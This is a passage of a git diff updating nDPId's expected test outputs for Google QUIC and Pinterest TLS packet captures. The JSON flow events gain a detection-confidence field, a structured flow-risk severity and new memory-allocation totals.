R6X90zwFDBlHdBDDCfh3iS1o2jSGLUvocncy0jQz8qak7nPw6oMW\/gU8WvBhkEaY\/b26hw+tYWakl5yNVwxnF\/7PKfJyyyPpmjSH2ycL45nydbEY1t1GYpcV+P7AunIs6enuyUp9NNdtbH\/d0RuYFGsVW1287YLi13LwF56RtlC\/tVGquwfxdqcbniCbYb8LvlGF6r32UjuoiuACdgmkrt6Wf7sAVkRHeYLY5bLkD+o6H+JIwDjoOA\/yI8iOw0QceAwvS35vC2IO56LiInTgA=="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24":"SNI TLS extension was missing"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+01019{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"user_agent":"Mozilla\/5.0 (Windows NT 5.2; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit\/531.21.10 (KHTML, like Gecko)","version":"TLSv1.3","alpn":"h3-29","ja3":"9addef84847d700f759746b237c405c8","tls_supported_versions":"TLSv1.3"}}
+00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1611427514609,"flow_last_seen":1611427514609,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1611427514609,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"8.8.8.8","src_port":39821,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"os_detected.pcapng","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600407 bytes
-~~ total memory freed........: 4600407 bytes
-~~ total allocations/frees...: 99568/99568
+~~ total memory allocated....: 4685360 bytes
+~~ total memory freed........: 4685360 bytes
+~~ total allocations/frees...: 101158/101158
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 2148 chars
diff --git a/test/results/pinterest.pcap.out b/test/results/pinterest.pcap.out
index b9d22f9df..2ae1019bc 100644
--- a/test/results/pinterest.pcap.out
+++ b/test/results/pinterest.pcap.out
@@ -9,9 +9,9 @@
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605289713743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289713743,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QUAAAAAoAL9IIXGAAACBAWgBAIICs+qMG0AAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289713761,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuB7prDGd77q\/EGoBJXgJPPAAACBAV4AQMDAwQCCArCuSBXz6owbQ=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289713761,"pkt":"qtsDr8lk5EKm5WPyht1gD\/cFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUge4Bu\/ur8QaawxnfgBAB+xfPAAABAQgKz6owf8K5IFc="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289713743,"flow_last_seen":1605289713761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289713761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01001{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289713743,"flow_last_seen":1605289713802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289713802,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289713743,"flow_last_seen":1605289713803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":442,"midstream":0,"ts_msec":1605289713803,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.pinterest.fr","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R0AAAAAoAL9IJUzAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714142,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289714142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -26,10 +26,10 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605289714142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714142,"pkt":"qtsDr8lk5EKm5WPyht1gAoQZACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnoBuzJfNsQAAAAAoAL9IJVNAAACBAWgBAIICtZiIAMAAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714171,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWcPSVr2OUKdUeoBJXgLJJAAACBAV4AQMDAwQCCArCuSHy1mIgAw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605289714171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714171,"pkt":"qtsDr8lk5EKm5WPyht1gBvDPACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnABu5Qp1R70la9kgBAB+zY+AAABAQgK1mIgIMK5IfI="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714172,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714180,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdpoDqe34hzBqoBJXgFKZAAACBAV4AQMDAwQCCArCuSH71mIgAw=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714180,"pkt":"qtsDr8lk5EKm5WPyht1gC2HAACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElnYBu\/iHMGqaA6nugBAB+9aEAAABAQgK1mIgKcK5Ifs="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714180,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWdKO8RXbDRQaFoBJXgAyCAAACBAV4AQMDAwQCCArCuSH61mIgAw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWchkTOMV4SazBoBJXgEidAAACBAV4AQMDAwQCCArCuSH71mIgAw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605289714181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714181,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWelCqgAoyXzbFoBJXgIWfAAACBAV4AQMDAwQCCArCuSH71mIgAw=="}
@@ -38,22 +38,22 @@
